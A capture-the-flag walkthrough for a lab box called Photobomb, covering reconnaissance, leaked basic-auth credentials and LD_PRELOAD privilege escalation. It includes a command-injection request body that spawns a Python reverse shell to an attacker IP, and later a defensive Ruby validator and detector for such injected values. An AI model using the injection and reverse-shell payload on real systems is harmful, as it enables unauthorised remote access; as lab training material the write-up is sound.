CTF Photobomb

  1. Rustscan
  2. wfuzz
    1. Subdomain
  3. dig
  4. Gobuster
  5. Website
    1. Internal port
    2. SSTI ?
    3. Source code
    4. Download the photos
  6. Reverse shell
  7. Privilege escalation

Rustscan

rustscan -a photobomb.htb --ulimit 5000

Output:

Open 10.129.202.206:22
Open 10.129.202.206:80

wfuzz

Subdomain

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://photobomb.htb' -H "Host: FUZZ.photobomb.htb" --sc 200

No subdomain

dig

dig axfr photobomb.htb @photobomb.htb

Nothing

Gobuster

gobuster dir -u http://photobomb.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html --wildcard | grep "Status: 200"

Website

Internal port

I was trying to determine whether the website can handle php or html, and I found this.
The image doesn't display.
Also, Sinatra should be a user.

SSTI ?

http://photobomb.htb/{{7*7}}

Source code

In the js file:

this is a username with the password.
http://pH0t0:b0Mb!@photobomb.htb/printer

Download the photos

I copy the request as a curl command.

curl 'http://photobomb.htb/printer' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://photobomb.htb' -H 'Authorization: Basic cEgwdDA6YjBNYiE=' -H 'Connection: keep-alive' -H 'Referer: http://photobomb.htb/printer' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000'

Reverse shell

If I add this to the body and listen with netcat, I can spawn a reverse shell.
Listen:

nc -nlvp 8645

Connect:

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;export RHOST="10.10.14.93";export RPORT=8645;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1920x1080
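The injection works because the filetype value is spliced into a shell command string. As an added example (not the Photobomb application's own code, whose source this write-up does not show), here is a hypothetical Ruby validator for a Sinatra-style POST /printer that rejects such bodies and builds the converter invocation as an argv array instead; the parameter names come from the write-up, the "convert" argv layout and the source_images directory are assumptions.

```ruby
require 'uri'

# Added example (not the Photobomb app's source): hypothetical validation for a
# Sinatra-style POST /printer. Parameter names photo/filetype/dimensions match the
# write-up; the "convert" argv layout and source_images directory are assumptions.
ALLOWED_FILETYPES = %w[jpg png].freeze
PHOTO_RE      = /\A[\w-]+\.(?:jpg|png)\z/   # bare filename, no path separators
DIMENSIONS_RE = /\A\d{1,5}x\d{1,5}\z/       # e.g. 3000x2000
SHELL_META_RE = /[;&|`$()<>\n'"\\]/

# Vulnerable pattern: untrusted values spliced into one string that /bin/sh parses,
# so filetype=png;<anything> runs <anything>. Only returned here, never executed.
def unsafe_command(params)
  "convert source_images/#{params['photo']} -resize #{params['dimensions']} #{params['filetype']}:-"
end

# Hardened form: allowlist/regex checks, then an argv array for system(*argv) or
# Process.spawn, which execs the binary directly without a shell.
# Returns [true, argv] or [false, reason].
def build_convert_argv(params)
  photo, filetype, dims = params.values_at('photo', 'filetype', 'dimensions')
  return [false, 'bad photo'] unless photo.is_a?(String) && photo.match?(PHOTO_RE)
  return [false, 'bad filetype'] unless ALLOWED_FILETYPES.include?(filetype)
  return [false, 'bad dimensions'] unless dims.is_a?(String) && dims.match?(DIMENSIONS_RE)
  [true, ['convert', "source_images/#{photo}", '-resize', dims, "#{filetype}:-"]]
end

# Detection helper for request logs: flag a form body whose fields carry shell
# metacharacters, which a legitimate printer request never needs.
def injection_attempt?(body)
  URI.decode_www_form(body).any? { |_k, v| v.match?(SHELL_META_RE) }
end

# Constructed sample bodies; the second uses a harmless ";id" in place of a real payload.
GOOD_BODY = 'photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000'
BAD_BODY  = 'photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;id&dimensions=1920x1080'

if __FILE__ == $PROGRAM_NAME
  [GOOD_BODY, BAD_BODY].each do |body|
    params = URI.decode_www_form(body).to_h
    puts "#{injection_attempt?(body) ? 'SUSPICIOUS' : 'ok'}  #{build_convert_argv(params).inspect}"
  end
end
```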

Privilege escalation

sudo -l

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

Create the payload

Download it:

And compile it:

I have to compile it myself…

This is fine.
Then send it to the target and run it.